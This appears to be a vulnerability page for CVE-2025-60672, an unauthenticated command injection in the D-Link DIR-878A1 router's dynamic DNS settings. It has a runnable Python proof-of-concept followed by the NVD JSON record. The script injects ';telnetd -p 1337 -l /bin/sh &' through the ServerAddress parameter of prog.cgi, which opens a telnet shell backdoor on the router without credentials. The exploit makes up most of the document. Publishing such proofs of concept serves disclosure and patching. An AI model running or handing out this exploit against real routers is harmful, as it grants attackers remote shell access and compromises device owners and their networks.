CVE-2025-60672

import requests # CVE-2025-60672 PoC - D-Link DIR-878A1 Command Injection # Target: D-Link DIR-878A1 router with firmware FW101B04.bin target_ip = "192.168.0.1" # Router IP address target_url = f"http://{target_ip}/prog.cgi" # Malicious payload - injects command to create backdoor user # The ServerAddress parameter is vulnerable to command injection malicious_payload = ";telnetd -p 1337 -l /bin/sh &" # Prepare the exploit request data = { "SetDynamicDNSSettings": "1", "ServerAddress": malicious_payload, "Hostname": "attacker-controlled-hostname", "Enable": "1" } print(f"[*] Exploiting CVE-2025-60672 on {target_ip}") print(f"[*] Sending malicious payload: {malicious_payload}") try: # Send the crafted HTTP request without authentication response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print("[+] Payload should be stored in NVRAM and executed by rc daemon") print("[+] Telnet backdoor should be active on port 1337") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Additional verification - check if router responds to our command verify_url = f"http://{target_ip}/status.cgi" try: verify_response = requests.get(verify_url, timeout=10) print(f"[*] Router status check: {verify_response.status_code}") except: print("[*] Router may be rebooting or payload executed")

{"cve": {"id": "CVE-2025-60672", "sourceIdentifier": "[email protected]", "published": "2025-11-13T19:15:48.040", "lastModified": "2025-11-17T19:04:14.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated command injection vulnerability exists in the D-Link DIR-878A1 router firmware FW101B04.bin. The vulnerability occurs in the 'SetDynamicDNSSettings' functionality, where the 'ServerAddress' and 'Hostname' parameters in prog.cgi are stored in NVRAM and later used by rc to construct system commands executed via twsystem(). An attacker can exploit this vulnerability remotely without authentication by sending a specially crafted HTTP request, leading to arbitrary command execution on the device."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-878_firmware:1.01b04:*:*:*:*:*:*:*", "matchCriteriaId": "CF6C5938-ACC7-4DD4-B3EF-AD64468AD60F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-878:a1:*:*:*:*:*:*:*", "matchCriteriaId": "70A35F2E-E46F-47CF-BF0F-9CF9A3242EDC"}]}]}], "references": [{"url": "http://d-link.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-878/CVE-2025-60672.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}